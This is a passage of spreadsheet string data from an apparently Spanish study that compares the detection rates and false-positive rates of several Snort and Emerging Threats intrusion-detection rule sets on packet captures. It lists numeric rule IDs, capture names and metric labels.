    <t>2001117, 2002749, 2002752, 2009582, 2019102, 2100366, 2100381, 2100384, 2100385, 2100399, 2100402, 2100408, 2100469, 2100472, 2100476, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>04 - DIT (04 - DIT (captura_00003_20240126181602)).pcapng</t>
  </si>
  <si>
    <t>109 MB</t>
  </si>
  <si>
    <t>2019102, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2009582, 2019102, 2100381, 2100382, 2100384, 2100385, 2100399, 2100402, 2100404, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>05 - DIT (05 - DIT (captura_00004_20240128151951)).pcapng</t>
  </si>
  <si>
    <t>107 MB</t>
  </si>
  <si>
    <t>2019102, 2027397, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2009582, 2019102, 2027397, 2036751, 2100381, 2100384, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>06 - DIT (06 - DIT (captura_00005_20240130061546)).pcapng</t>
  </si>
  <si>
    <t>106 MB</t>
  </si>
  <si>
    <t>2009967, 2019102, 2027397, 2101384, 2101411</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2008470, 2009205, 2009206, 2009207, 2009208, 2009582, 2009967, 2019102, 2027397, 2100381, 2100384, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>07 - DIT (07 - DIT (captura_00006_20240131165021)).pcapng</t>
  </si>
  <si>
    <t>48 MB</t>
  </si>
  <si>
    <t>2001117, 2002749, 2002752, 2008470, 2009206, 2009207, 2009208, 2019102, 2027397, 2100381, 2100384, 2100385, 2100399, 2100402, 2100408, 2100469, 2100472, 2100527, 2101384, 2101411, 2101417, 2101917</t>
  </si>
  <si>
    <t>CIC2018_DIAX.pcapng</t>
  </si>
  <si>
    <t>60GB</t>
  </si>
  <si>
    <t>1010, 1054, 11968, 1201, 1280, 1394, 1411, 1413, 1417, 1418, 1419, 1420, 1421, 1447, 1448, 1616, 1852, 1917, 2003, 2004, 2049, 21492, 2339, 2418, 254, 27899, 28555, 28556, 28557, 29456, 31136, 366, 368, 372, 373, 381, 382, 384, 385, 396, 399, 401, 402, 404, 408, 41978, 42255, 42340, 42944, 449, 451, 453, 566, 579, 613, 649, 650, 853, 882, 895</t>
  </si>
  <si>
    <t>1010, 1054, 11968, 1201, 1280, 1394, 1411, 1413, 1417, 1418, 1419, 1420, 1421, 1447, 1448, 1616, 1852, 1917, 2003, 2004, 2049, 21492, 2339, 2418, 254, 27899, 28555, 28556, 28557, 29456, 31136, 366, 368, 372, 373, 381, 382, 384, 385, 396, 399, 401, 402, 404, 408, 41978, 42255, 42340, 42944, 449, 451, 453, 566, 579, 613, 649, 650, 853, 882, 895, 2001219, 2001330, 2001569, 2001579, 2001581, 2001583, 2001972, 2002911, 2003068, 2008578, 2008581, 2009099, 2010144, 2010935, 2010936, 2010937, 2010938, 2010939, 2011716, 2012296, 2012647, 2012709, 2012710, 2012711, 2012712, 2013479, 2014702, 2015856, 2016149, 2016778, 2018124, 2018585, 2019102, 2019401, 2023640, 2023753, 2024217, 2024297, 2025275, 2025649, 2025650, 2025712, 2025822, 2025992, 2027390, 2027412, 2027413, 2027757, 2029575, 2036252, 2038967, 2038968, 2050281, 2100366, 2100368, 2100369, 2100372, 2100373, 2100537, 2100538, 2100566, 2100579, 2101201, 2101280, 2101411, 2101413, 2101616, 2102003, 2102004, 2102465, 2102466, 2102924</t>
  </si>
  <si>
    <t xml:space="preserve">1010, 1054, 11263, 11968, 1201, 12006, 12065, 12066, 12685, 1280, 13719, 1394, 13974, 14019, 1411, 1413, 1417, 1418, 1419, 1420, 1421, 1447, 1448, 15306, 15362, 15517, 15569, 15850, 1616, 16282, 16510, 16642, 17110, 17152, 17410, 17458, 17494, 18174, 18474, 1852, 18528, 1917, 19786, 19887, 2003, 2004, 20212, 20439, 2049, 20620, 21232, 21492, 21817, 2339, 23493, 23861, 2418, 24303, 24304, 24378, 254, 26317, 26989, 26994, 27611, 27899, 27938, 28039, 28069, 28555, 28556, 28557, 28993, 29456, 29519, 29639, 29957, 31136, 31341, 31399, 31767, 32481, 32757, 32760, 34799, 35180, 35193, 3547, 35527, 36376, 366, 36650, 3679, 368, 372, 373, 37545, 37908, 37909, 38038, 381, 38104, 38124, 382, 38270, 38381, 384, 385, 38575, 38595, 38602, 39488, 396, 399, 39993, 401, 40186, 402, 404, 4060, 408, 41054, 41055, 41056, 41057, 41061, 41063, 41065, 41066, 41067, 41068, 41071, 41072, 41074, 41075, 41077, 41186, 4135, 41379, 41524, 41526, 41742, 41807, 41978, 42016, 42017, 42255, 42340, 42785, 42944, 42946, 43359, 43362, 43755, 43808, 44455, 44484, 44485, 44486, 44487, 44488, 44489, 44679, 449, 451, 453, 45577, 45578, 45941, 46373, 46412, 46533, 46637, 47082, 47725, 47726, 48134, 48321, 48326, 48331, 48894, 49040, 50447, 50633, 51000, 51065, 51127, 51284, 51333, 51344, 51744, 5318, 53375, 566, 5730, 57756, 57878, 579, 59258, 59597, 59606, 613, 649, 650, 6699, 853, 882, 895, 2001219, 2001330, 2001569, 2001579, 2001581, 2001583, 2001972, 2002911, 2003068, 2008578, 2008581, 2009099, 2010144, 2010935, 2010936, 2010937, 2010938, 2010939, 2011716, 2012296, 2012647, 2012709, 2012710, 2012711, 2012712, 2013479, 2014702, 2015856, 2016149, 2016778, 2018124, 2018585, 2019102, 2019401, </t>
  </si>
  <si>
    <t>1010, 1054, 11263, 11968, 12006, 1201, 12065, 12066, 12685, 1280, 13719, 1394, 13974, 14019, 1411, 1413, 1417, 1418, 1419, 1420, 1421, 1447, 1448, 15306, 15362, 15517, 15569, 15850, 1616, 16282, 16510, 16642, 17110, 17152, 17410, 17458, 17494, 18174, 18474, 1852, 18528, 1917, 19786, 19887, 2003, 2004, 20212, 20439, 2049, 20620, 2100254, 2100312, 2100366, 2100368, 2100369, 2100372, 2100373, 2100381, 2100382, 2100384, 2100385, 2100396, 2100399, 2100401, 2100402, 2100404, 2100408, 2100449, 2100451, 2100453, 2100469, 2100485, 2100486, 2100524, 2100527, 2100537, 2100538, 2100566, 2100615, 2100628, 2100649, 2100650, 2101201, 2101280, 2101411, 2101417, 2101418, 2101420, 2101447, 2101448, 2101616, 2101620, 2101917, 2102003, 2102004, 2102049, 2102329, 2102336, 2102418, 2102465, 2102466, 2102924, 2102925, 2000428, 2000537, 2000538, 2000545, 2001117, 2001219, 2001329, 2001330, 2001331, 2001353, 2001384, 2001404, 2001569, 2001581, 2001904, 2001972, 2002749, 2002752, 2002826, 2002911, 2002946, 2002948, 2003006, 2003012, 2003013, 2003020, 2003068, 2003595, 2006408, 2006409, 2007571, 2008230, 2008578, 2008581, 2009099, 2009205, 2009206, 2009207, 2009208, 2009582, 2009583, 2009584, 2009767, 2009768, 2010144, 2010518, 2010706, 2010935, 2010936, 2010937, 2010938, 2010939, 2011016, 2011368, 2011408, 2011411, 2011716, 2011764, 2012296, 2012709, 2012710, 2012711, 2012712, 2013273, 2013479, 2013490, 2013491, 2014384, 2014702, 2016149, 2016662, 2018124, 2018585, 2019102, 2019401, 2021630, 2022218, 2023640, 2023753, 2023997, 2024766, 2025275, 2025649, 2025650, 2025822, 2025992, 2027390, 2027412, 2027413, 2027757, 2027759, 2027768, 2027865, 2030390, 2030555, 2030835, 2031489, 2031490, 2031491, 2034857, 2036252, 2036751, 2038967, 2038968, 2044665, 2044666, 2049956, 2049957, 2051116, 366, 368, 372, 373, 381, 382, 384, 385, 396, 399, 401, 402, 404, 408, 41978, 42016, 42017, 42255, 42340, 42785, 42944, 42946, 43359, 43362, 43755, 43808, 44455, 44484, 44485, 44486, 44487, 44488, 44489, 44679, 449, 451, 453, 45577, 45578, 45941, 46373, 46412, 46533, 46637, 47082, 47725, 47726, 48134, 48321, 48326, 48331, 48894, 49040, 50447, 50633, 51000, 51065, 51127, 51284, 51333, 51344, 51744, 5318, 53375, 566, 5730, 57756, 57878, 579, 59258, 59597, 59606, 613, 649, 650, 6699, 853, 882, 895</t>
  </si>
  <si>
    <t>109010003, 54482, 31993, 56505</t>
  </si>
  <si>
    <t>TOTAL</t>
  </si>
  <si>
    <t>254, 366, 368, 372, 373, 381, 382, 384, 385, 396, 399, 401, 402, 404, 408, 449, 451, 453, 566, 579, 613, 649, 650, 853, 882, 895, 1010, 1054, 1201, 1280, 1394, 1411, 1413, 1417, 1418, 1419, 1420, 1421, 1447, 1448, 1616, 1852, 1917, 2003, 2004, 2049, 2339, 2418, 11968, 21492, 27899, 28555, 28556, 28557, 29456, 31136, 41978, 42255, 42340, 42944, 2001219, 2001330, 2001569, 2001579, 2001581, 2001583, 2001972, 2002910, 2002911, 2003068, 2008120, 2008578, 2008581, 2009099, 2009967, 2010144, 2010935, 2010936, 2010937, 2010938, 2010939, 2011716, 2012296, 2012647, 2012709, 2012710, 2012711, 2012712, 2013479, 2014702, 2015856, 2016149, 2016778, 2018124, 2018585, 2019102, 2019401, 2023640, 2023753, 2024217, 2024297, 2025275, 2025649, 2025650, 2025712, 2025822, 2025992, 2027390, 2027397, 2027412, 2027413, 2027757, 2029575, 2036252, 2038967, 2038968, 2050281, 2100366, 2100368, 2100369, 2100372, 2100373, 2100476, 2100537, 2100538, 2100566, 2100579, 2101201, 2101280, 2101384, 2101411, 2101413, 2101616, 2102003, 2102004, 2102465, 2102466, 2102924</t>
  </si>
  <si>
    <t>1010, 1054, 11263, 11968, 1201, 12006, 12065, 12066, 12685, 1280, 13719, 1394, 13974, 14019, 1411, 1413, 1417, 1418, 1419, 1420, 1421, 1447, 1448, 15306, 15362, 15517, 15569, 15850, 1616, 16282, 16510, 16642, 17110, 17152, 17410, 17458, 17494, 18174, 18474, 1852, 18528, 1917, 19786, 19887, 2003, 2004, 20212, 20439, 2049, 20620, 2100381, 2100382, 2100383, 2100384, 2100385, 2100396, 2100397, 2100398, 2100399, 2100401, 2100402, 2100403, 2100404, 2100405, 2100406, 2100408, 2100449, 2100450, 2100451, 2100452, 2100453, 2100454, 2100469, 2100470, 2100472, 2100473, 2100474, 2100485, 2100486, 2100487, 2100488, 2100524, 2100525, 2100527, 2100528, 2100537, 2100538, 2100539, 2100540, 2100566, 2100567, 2100568, 2100615, 2100616, 2100617, 2100618, 2100628, 2100629, 2100630, 2100649, 2100650, 2100651, 2100652, 2100653, 2101201, 2101202, 2101203, 2101280, 2101281, 2101282, 2101411, 2101412, 2101413, 2101414, 2101417, 2101418, 2101420, 2101421, 2101447, 2101448, 2101449, 2101616, 2101617, 2101618, 2101620, 2101621, 2101622, 2101917, 2101918, 2101919, 2102003, 2102004, 2102005, 2102006, 2102049, 2102329, 2102330, 2102336, 2102337, 2102338, 2102418, 2102419, 2010937, 2002911, 2003068, 2008120, 2010935, 2100476, 2101384, 2101411, 2100366, 2027397, 2009967, 51037, 20212, 20439, 2049, 20620, 21232, 21492, 21817, 2339, 23493, 23861, 2418, 24303, 24304, 24378, 254, 26317, 26989, 26994, 27611, 27899, 27938, 28039, 28069, 28555, 28556, 28557, 28993, 29456, 29519, 29639, 29957, 31136, 31341, 31399, 31767, 32481, 32757, 32760, 34799, 35180, 35193, 3547, 35527, 36376, 366, 36650, 3679, 368, 372, 373, 37545, 37908, 37909, 38038, 381, 38104, 38124, 382, 38270, 38381, 384, 385, 38575, 38595, 38602, 39488, 396, 399, 39993, 401, 40186, 402, 404, 4060, 408, 41054, 41055, 41056, 41057, 41061, 41063, 41065, 41066, 41067, 41068, 41071, 41072, 41074, 41075, 41077, 41186, 4135, 41379, 41524, 41526, 41742, 41807, 41978, 42016, 42017, 42255, 42340, 42785, 42944, 42946, 43359, 43362, 43755, 43808, 44455, 44484, 44485, 44486, 44487, 44488, 44489, 44679, 449, 451, 453, 45577, 45578, 45941, 46373, 46412, 46533, 46637, 47082, 47725, 47726, 48134, 48321, 48326, 48331, 48894, 49040, 50447, 50633, 51000, 51000, 51037, 51065, 51127, 51284, 51333, 51344, 51744, 5318, 53375, 566, 5730, 57756, 57878, 579, 59258, 59597, 59606, 613, 649, 650, 6699, 853, 882, 895, 202012, 2021630, 2022218, 2023640, 2023753, 2023997, 2024766, 2025275, 2025649, 2025650, 2025822, 2025992, 2027390, 2027397, 2027412, 2027413, 2027557, 2027757, 2027759, 2027768, 2027865, 2030390, 2030555, 2030835, 2031489, 2031490, 2031491, 2034857, 2036252, 2036751, 2038967, 2038968, 2044665, 2044666, 2049956, 2049957, 2051116</t>
  </si>
  <si>
    <t>1010, 1054, 11263, 11968, 12006, 1201, 12065, 12066, 12685, 1280, 13719, 1394, 13974, 14019, 1411, 1413, 1417, 1418, 1419, 1420, 1421, 1447, 1448, 15306, 15362, 15517, 15569, 15850, 1616, 16282, 16510, 16642, 17110, 17152, 17410, 17458, 17494, 18174, 18474, 1852, 18528, 1917, 19786, 19887, 2003, 2004, 2000428, 2000537, 2000538, 2000545, 2001117, 2001219, 2001329, 2001330, 2001331, 2001353, 2001384, 2001404, 2001569, 2001581, 2001904, 2001972, 2002749, 2002752, 2002826, 2002910, 2002911, 2002946, 2002948, 2003006, 2003012, 2003013, 2003020, 2003068, 2003595, 2006408, 2006409, 2007571, 2008120, 2008470, 2008578, 2008581, 2009099, 2009205, 2009206, 2009207, 2009208, 2009582, 2009583, 2009584, 2009767, 2009768, 2009967, 2010144, 2010518, 2010706, 2010935, 2010936, 2010937, 2010938, 2010939, 2011016, 2011368, 2011408, 2011411, 2011716, 2011764, 2012296, 2012709, 2012710, 2012711, 2012712, 2013273, 2013479, 2013490, 2013491, 2014384, 2014702, 2016149, 2016662, 2018124, 2018585, 2019102, 2019401, 202012, 2021630, 2022218, 2023640, 2023753, 2023997, 2024766, 2025275, 2025649, 2025650, 2025822, 2025992, 2027390, 2027397, 2027412, 2027413, 2027757, 2027759, 2027768, 2027865, 2030390, 2030555, 2030835, 2031489, 2031490, 2031491, 2034857, 2036252, 2036751, 2038967, 2038968, 2044665, 2044666, 2049956, 2049957, 2051116, 366, 368, 372, 373, 381, 382, 384, 385, 396, 399, 401, 402, 404, 408, 41978, 42016, 42017, 42255, 42340, 42785, 42944, 42946, 43359, 43362, 43755, 43808, 44455, 44484, 44485, 44486, 44487, 44488, 44489, 44679, 449, 451, 453, 45577, 45578, 45941, 46373, 46412, 46533, 46637, 47082, 47725, 47726, 48134, 48321, 48326, 48331, 48894, 49040, 50447, 50633, 51000, 51037, 51065, 51127, 51284, 51333, 51344, 51744, 5318, 53375, 566, 5730, 57756, 57878, 579, 59258, 59597, 59606, 613, 649, 650, 6699, 853, 882, 895, 12065, 12685, 1280, 1616, 2003, 2004, 20212, 20439, 2049, 20620, 2100381, 2100382, 2100383, 2100384, 2100385, 2100396, 2100397, 2100398, 2100399, 2100401, 2100402, 2100403, 2100404, 2100405, 2100406, 2100408, 2100449, 2100450, 2100451, 2100452, 2100453, 2100454, 2100469, 2100470, 2100472, 2100473, 2100474, 2100485, 2100486, 2100487, 2100488, 2100524, 2100525, 2100527, 2100528, 2100537, 2100538, 2100539, 2100540, 2100566, 2100567, 2100568, 2100615, 2100616, 2100617, 2100618, 2100628, 2100629, 2100630, 2100649, 2100650, 2100651, 2100652, 2100653, 2101201, 2101202, 2101203, 2101280, 2101281, 2101282, 2101411, 2101412, 2101413, 2101414, 2101417, 2101418, 2101420, 2101421, 2101447, 2101448, 2101449, 2101616, 2101617, 2101618, 2101620, 2101621, 2101622, 2101917, 2101918, 2101919, 2102003, 2102004, 2102005, 2102006, 2102049, 2102049, 2102049, 2102329, 2102329, 2102330, 2102336, 2102337, 2102338, 2102418, 2102418, 2102419, 2102465, 2102465, 2102466, 2102466, 2102467, 2102467, 2102924, 2102924, 2102925, 2001117, 2001219, 2001330, 2001331, 2001353, 2001384, 2001404, 2001569, 2001581, 2001904, 2001972, 2002749, 2002752, 2002826, 2002910, 2002911, 2002946, 2002948, 2003006, 2003012, 2003013, 2003020, 2003068, 2003595, 2006408, 2006409, 2007571, 2008120, 2008470, 2008578, 2008581, 2009099, 2009205, 2009206, 2009207, 2009208, 2009582, 2009583, 2009584, 2009767, 2009768, 2009967, 2010144, 2010518, 2010706, 2010935, 2010936, 2010937, 2010938, 2010939, 2011016, 2011368, 2011408, 2011411, 2011716, 2011764, 2012296, 2012709, 2012710, 2012711, 2012712, 2013273, 2013479, 2013490, 2013491, 2014384, 2014702, 2016149, 2016662, 2018124, 2018585, 2019102, 2019401, 202012, 2021630, 2022218, 2023640, 2023753, 2023997, 2024766, 2025275, 2025649, 2025650, 2025822, 2025992, 2027390, 2027397, 2027412, 2027413, 2027757, 2027759, 2027768, 2027865, 2030390, 2030555, 2030835, 2031489, 2031490, 2031491, 2034857, 2036252, 2036751, 2038967, 2038968, 2044665, 2044666, 2049956, 2049957, 2051116</t>
  </si>
  <si>
    <t>TP totales (SIDs) - Automático</t>
  </si>
  <si>
    <t>Porcentajes FP (SIDs) - Automático</t>
  </si>
  <si>
    <t>RENDIMIENTO PROMEDIO</t>
  </si>
  <si>
    <t>Número TPs Automático (RS1)</t>
  </si>
  <si>
    <t>Número TPs Automático (RS2)</t>
  </si>
  <si>
    <t>Número TPs Automático (RS3)</t>
  </si>
  <si>
    <t>Número TPs Automático (RS4)</t>
  </si>
  <si>
    <t>% FPs Automático (RS1)</t>
  </si>
  <si>
    <t>% FPs Automático (RS2)</t>
  </si>
  <si>
    <t>%  FPs Automático (RS3)</t>
  </si>
  <si>
    <t>% FPs Automático (RS4)</t>
  </si>
  <si>
    <t>DETECCIONES EFICACES</t>
  </si>
  <si>
    <t>Categorización de Ataques - LV1 vs L2</t>
  </si>
  <si>
    <t>Nº Único de Reglas por Paquete</t>
  </si>
  <si>
    <t>Registros Totales - Valores Absolutos</t>
  </si>
  <si>
    <t>Registros Particulares - Valores Absolutos (Táctica)</t>
  </si>
  <si>
    <t>Registros Particulares - Valores Absolutos (Técnica)</t>
  </si>
  <si>
    <t>Técnicas que generan Alertas (TP)</t>
  </si>
  <si>
    <t>Ataques que generan Alertas (TP)</t>
  </si>
  <si>
    <t>Alertas totales (SIDs)</t>
  </si>
  <si>
    <t>Alertas promedio (SIDs) por ataque</t>
  </si>
  <si>
    <t>RULESET  4</t>
  </si>
  <si>
    <t>RULESET  3</t>
  </si>
  <si>
    <t>RULESET  2</t>
  </si>
  <si>
    <t>RULESET  1</t>
  </si>
  <si>
    <t>Community</t>
  </si>
  <si>
    <t>Nº de Flujos Totales</t>
  </si>
  <si>
    <t>Nº Flujos con Ataque Totales</t>
  </si>
  <si>
    <t>Nº de Mensajes de Red con Ataques Totales</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales Totales</t>
  </si>
  <si>
    <t>Concepto/Táctica</t>
  </si>
  <si>
    <t>Táctica</t>
  </si>
  <si>
    <t>TOTAL TÉCNICAS</t>
  </si>
  <si>
    <t>TOTAL ATAQUES</t>
  </si>
  <si>
    <t>TOTAL SIDS</t>
  </si>
  <si>
    <t>CAPACIDAD DE DETECCIÓN (CD)</t>
  </si>
  <si>
    <t>Promedio de Número de flujos con ataque detectados /Número de flujos con ataque totales</t>
  </si>
  <si>
    <t>RuleSet</t>
  </si>
  <si>
    <t>% Promedio Detección Eficaz Flujos</t>
  </si>
  <si>
    <t>% Promedio Detección Eficaz Ataques</t>
  </si>
  <si>
    <t>Protocolo</t>
  </si>
  <si>
    <t>% Promedio Detección Flujos TP</t>
  </si>
  <si>
    <t>% Promedio Detección Eficaz Flujos TP</t>
  </si>
  <si>
    <t>% Promedio Detección Eficaz Ataques TP</t>
  </si>
  <si>
    <t>Flujos Totales ✔</t>
  </si>
  <si>
    <t>TASA DE FP (FP)</t>
  </si>
  <si>
    <t>Promedio de Número de alertas erróneas /Número de alertas totales</t>
  </si>
  <si>
    <t>Flujos con Ataque Totales ✔</t>
  </si>
  <si>
    <t>RENDIMIENTO</t>
  </si>
  <si>
    <t>Nº de Flujos Totales ✔</t>
  </si>
  <si>
    <t>Nº Flujos con Ataque Totales ✔</t>
  </si>
  <si>
    <t>Nº de Mensajes de Red con Ataques Totales ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales Totales ✔</t>
  </si>
  <si>
    <t>Mensajes con Ataque Totales ✔</t>
  </si>
  <si>
    <t>Instancias de Ataque Principales Totales ✔</t>
  </si>
  <si>
    <t>Nº de Flujos Totales (sólo en Ataques con Análisis Manual Estudiado) ✔</t>
  </si>
  <si>
    <t>RENDIMIENTO TOTAL</t>
  </si>
  <si>
    <t>Nº Flujos con Ataque Totales (sólo en Ataques con Análisis Manual Estudiado) ✔</t>
  </si>
  <si>
    <t>Nº de Mensajes de Red con Ataques Totales  (sólo en Ataques con Análisis Manual Estudiado) ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales Totales (sólo en Ataques con Análisis Manual Estudiado)  ✔</t>
  </si>
  <si>
    <t>Número de flujos con ataque detectados /Número de flujos con ataque totales</t>
  </si>
  <si>
    <t>Número de alertas erróneas /Número de alertas totales</t>
  </si>
  <si>
    <t>Nº de Flujos con Ataque Detectados RS1 ✔</t>
  </si>
  <si>
    <t>Nº de Flujos con Ataque Detectados RS2 ✔</t>
  </si>
  <si>
    <t>Nº de Flujos con Ataque Detectados RS3 ✔</t>
  </si>
  <si>
    <t>Nº de Flujos con Ataque Detectados RS4 ✔</t>
  </si>
  <si>
    <t>Nº de Flujos con Ataque TP Detectados (Manual) RS1 ✔</t>
  </si>
  <si>
    <t>Nº de Flujos con Ataque TP Detectados (Manual) RS2 ✔</t>
  </si>
  <si>
    <t>Nº de Flujos con Ataque TP Detectados (Manual) RS3 ✔</t>
  </si>
  <si>
    <t>Nº de Flujos con Ataque TP Detectados (Manual) RS4 ✔</t>
  </si>
  <si>
    <t>RENDIMIENTO PROMEDIO EFICAZ FLUJOS</t>
  </si>
  <si>
    <t xml:space="preserve">PORCENTAJE TP RESPECTO A TOTAL </t>
  </si>
  <si>
    <t>Nº de Flujos con Ataque TP Detectados (Automático) RS1 ✔</t>
  </si>
  <si>
    <t>Nº de Flujos con Ataque TP Detectados (Automático) RS2 ✔</t>
  </si>
  <si>
    <t>Nº de Flujos con Ataque TP Detectados (Automático) RS3 ✔</t>
  </si>
  <si>
    <t>Nº de Flujos con Ataque TP Detectados (Automático) RS4 ✔</t>
  </si>
  <si>
    <t xml:space="preserve">PORCENTAJE FP RESPECTO A TOTAL </t>
  </si>
  <si>
    <t>TOTAL TÉCNICAS CON ALERTA</t>
  </si>
  <si>
    <t>TOTAL ATAQUES CON ALERTA</t>
  </si>
  <si>
    <t>TOTAL ALERTAS</t>
  </si>
  <si>
    <t>TOTAL TÉCNICAS SIN ALERTA</t>
  </si>
  <si>
    <t>TOTAL ATAQUES SIN ALERTA</t>
  </si>
  <si>
    <t>PORCENTAJE RESPECTO A TOTAL</t>
  </si>
  <si>
    <t>Nº de Mensajes con Ataque Detectados RS1 ✔</t>
  </si>
  <si>
    <t>Nº de Mensajes con Ataque Detectados RS2 ✔</t>
  </si>
  <si>
    <t>Nº de Mensajes con Ataque Detectados RS3 ✔</t>
  </si>
  <si>
    <t>Nº de Mensajes con Ataque Detectados RS4 ✔</t>
  </si>
  <si>
    <t>PORCENTAJE TÉCNICAS CON ALERTA</t>
  </si>
  <si>
    <t>PORCENTAJE CON ALERTA</t>
  </si>
  <si>
    <t>RENDIMIENTO PROMEDIO EFICAZ ATAQUES</t>
  </si>
  <si>
    <t>PORCENTAJE TÉCNICAS SIN ALERTA</t>
  </si>
  <si>
    <t>PORCENTAJE SIN ALERTA</t>
  </si>
  <si>
    <t>TP totales (SIDs) (Manual)</t>
  </si>
  <si>
    <t>Promedio de Número de flujos con ataque detectados (TP + Colaterales) /Número de flujos con ataque totales</t>
  </si>
  <si>
    <t>Nº de Mensajes con Ataque TP (Manual) Detectados RS1 ✔</t>
  </si>
  <si>
    <t>Nº de Mensajes con Ataque TP (Manual) Detectados RS2 ✔</t>
  </si>
  <si>
    <t>Nº de Mensajes con Ataque TP (Manual) Detectados RS3 ✔</t>
  </si>
  <si>
    <t>Nº de Mensajes con Ataque TP (Manual) Detectados RS4 ✔</t>
  </si>
  <si>
    <t>TOTAL TP</t>
  </si>
  <si>
    <t>PORCENTAJE TP RESPECTO A TOTAL (RS4)</t>
  </si>
  <si>
    <t>PORCENTAJE FP RESPECTO A TOTAL (RS4)</t>
  </si>
  <si>
    <t>PORCENTAJE FP RESPECTO A TOTAL (RS3)</t>
  </si>
  <si>
    <t>PORCENTAJE FP RESPECTO A TOTAL (RS2)</t>
  </si>
  <si>
    <t>PORCENTAJE FP RESPECTO A TOTAL (RS1)</t>
  </si>
  <si>
    <t>Efectividad SIDs (Nº de TP / Alertas totales)</t>
  </si>
  <si>
    <t>Nº de Mensajes con Ataque TP (Automático) Detectados RS1 ✔</t>
  </si>
  <si>
    <t>Nº de Mensajes con Ataque TP (Automático) Detectados RS2 ✔</t>
  </si>
  <si>
    <t>Nº de Mensajes con Ataque TP (Automático) Detectados RS3 ✔</t>
  </si>
  <si>
    <t>Nº de Mensajes con Ataque TP (Automático) Detectados RS4 ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales Detectados RS1 ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales (Manual) Detectados RS2 ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales (Manual) Detectados RS3 ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales (Manual) Detectados RS4 ✔</t>
  </si>
  <si>
    <t>La gráfica superior muestra el número de reglas únicas de cada paquete (con únicas se hace referencia a que no se encuentran en otros paquetes de reglas). La última columna representa la suma total, o subtotal, de todas las reglas únicas que conforman el estudio (incluidas en el RS4). Resulta sorprendente la notable diferencia en el número de reglas entre el paquete Community (sin necesidad de registro en Snort) y el Talos Registered (con necesidad de registro en Snort). Teniendo en cuenta la totalidad de reglas del paquete Talos Registered (únicas más las de Community), hablaríamos de que el paquete de reglas Community tan sólo constituye un 8,8 % del global. Respecto a las reglas elaboradas por Emerging Threats, el paquete por defecto (ETOpen) agrupa más reglas únicas que el optimizado, el cual se puede considerar como un añadido o complemento del principal.</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales TP (Manual) Detectados RS1 ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales TP (Manual) Detectados RS2 ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales TP (Manual) Detectados RS3 ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales TP (Manual) Detectados RS4 ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales TP (Automático) Detectados RS1 ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales TP (Automático + Manual) Detectados RS2 ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales TP (Automático + Manual) Detectados RS3 ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales TP (Automático + Manual) Detectados RS4 ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales TALOS Community Detectadas ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales TP (Automático) TALOS Community Detectadas ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales TALOS Registered Detectadas ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales TALOS Registered (Automático) Detectadas ✔</t>
  </si>
  <si>
    <t>PROMEDIO RULESET/TÁCTICA</t>
  </si>
  <si>
    <t>Porcentaje FP Automático</t>
  </si>
  <si>
    <t>Porcentaje FP Manual Total</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales ETOpen Detectadas ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales TP (Automático) ETOpen Detectadas ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales ETOpen Optimizado Detectadas ✔</t>
  </si>
  <si>
    <t>Nº de Instancias de Ataque Principales TP (Automático) ETOpen Optimizado Detectadas ✔</t>
  </si>
  <si>
    <t>Registros Totales - Porcentajes Totales</t>
  </si>
  <si>
    <t>% Flujos con Ataque Detectados RS1 ✔</t>
  </si>
  <si>
    <t>% Flujos con Ataque Detectados RS2 ✔</t>
  </si>
  <si>
    <t>% Flujos con Ataque Detectados RS3 ✔</t>
  </si>
  <si>
    <t>% Flujos con Ataque Detectados RS4 ✔</t>
  </si>
  <si>
    <t>% Flujos con Ataque TP Detectados (Manual) RS1 ✔</t>
  </si>
  <si>
    <t>% Flujos con Ataque TP Detectados (Manual) RS2 ✔</t>
  </si>
  <si>
    <t>% Flujos con Ataque TP Detectados (Manual) RS3 ✔</t>
  </si>
  <si>
    <t>% Flujos con Ataque TP Detectados (Manual) RS4 ✔</t>
  </si>
  <si>
    <t>% Flujos con Ataque TP Detectados (Automático) RS1 ✔</t>
  </si>
  <si>
    <t>% Flujos con Ataque TP Detectados (Automático) RS2 ✔</t>
  </si>
  <si>
    <t>% Flujos con Ataque TP Detectados (Automático) RS3 ✔</t>
  </si>
  <si>
    <t>% Flujos con Ataque TP Detectados (Automático) RS4 ✔</t>
  </si>
  <si>
    <t xml:space="preserve">  </t>
  </si>
  <si>
    <t>% Mensajes con Ataque Detectados RS1 ✔</t>
  </si>
  <si>
    <t>% Mensajes con Ataque Detectados RS2 ✔</t>
  </si>
  <si>
    <t>% Mensajes con Ataque Detectados RS3 ✔</t>
  </si>
  <si>
    <t>% Mensajes con Ataque Detectados RS4 ✔</t>
